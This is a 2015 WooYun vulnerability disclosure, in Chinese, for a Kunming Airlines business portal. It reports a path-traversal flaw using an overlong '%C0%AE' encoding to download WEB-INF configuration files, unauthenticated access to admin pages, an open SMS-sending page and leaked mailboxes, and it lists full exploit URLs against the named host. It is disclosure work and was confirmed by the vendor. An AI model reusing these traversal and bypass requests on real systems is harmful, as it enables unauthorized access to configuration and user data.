当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140981

漏洞标题:昆明航空某平台可down下所有配置文件(权限绕过、大量信息泄露、可随意发送短信钓鱼等等)

相关厂商:昆明航空

漏洞作者: 来了

提交时间:2015-09-14 08:52

修复时间:2015-10-31 11:40

公开时间:2015-10-31 11:40

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-14: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

权限绕过、大量信息泄露、可随意发送短信钓鱼、导致深圳航空集团邮箱沦陷、导致用户邮箱沦陷。。。。

详细说明:

问题网站:http://bizinfo.airkunming.com/
1、配置文件泄露(可Down下整个WEB-INF下的所有文件)
http://bizinfo.airkunming.com/%C0%AE/WEB-INF/web.xml
http://bizinfo.airkunming.com/%C0%AE/WEB-INF/struts-config.xml
http://bizinfo.airkunming.com/%C0%AE/WEB-INF/config/example/struts-config-example.xml http://bizinfo.airkunming.com/%C0%AE/WEB-INF/config/system/struts-config-system.xml
.............
2、敏感信息泄露
3、权限绕过
http://bizinfo.airkunming.com/module/system/hrsearchepositionList.jsp
http://bizinfo.airkunming.com/module/b2c/message/msgList.jsp
http://bizinfo.airkunming.com/module/b2c/member/userList.jsp
http://bizinfo.airkunming.com/module/info/info_website.jsp
.........

漏洞证明:

1、配置文件泄露

配置文件泄露1.jpg


配置文件泄露2.jpg


2、权限绕过(基本上所有功能界面都可以访问)

权限绕过1.jpg


http://bizinfo.airkunming.com/module/system/hrsearchepositionList.jsp

权限绕过2.jpg


http://bizinfo.airkunming.com/module/b2c/member/userList.jsp

权限绕过3.jpg


http://bizinfo.airkunming.com/module/info/info_website.jsp
http://bizinfo.airkunming.com/module/system/SysLogList.jsp
。。。。
3、可随意发送短信钓鱼
http://bizinfo.airkunming.com/module/b2c/sendMessage.jsp

发短信1.jpg


发短信2.jpg


4、导致深圳航空集团邮箱沦陷

深圳航空邮箱1.jpg


深圳航空邮箱2.jpg


5、导致某些用户邮箱沦陷
基本上每份邮件都有邮箱账号,导致用户邮箱地址泄露,有些用户还掺杂着敏感信息

用户邮箱1.jpg


用户邮箱2.jpg


修复方案:

升级IBM Websphere

版权声明:转载请注明来源 来了@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-16 11:38

厂商回复:

感谢关注,已启动漏洞修复程序

最新状态:

暂无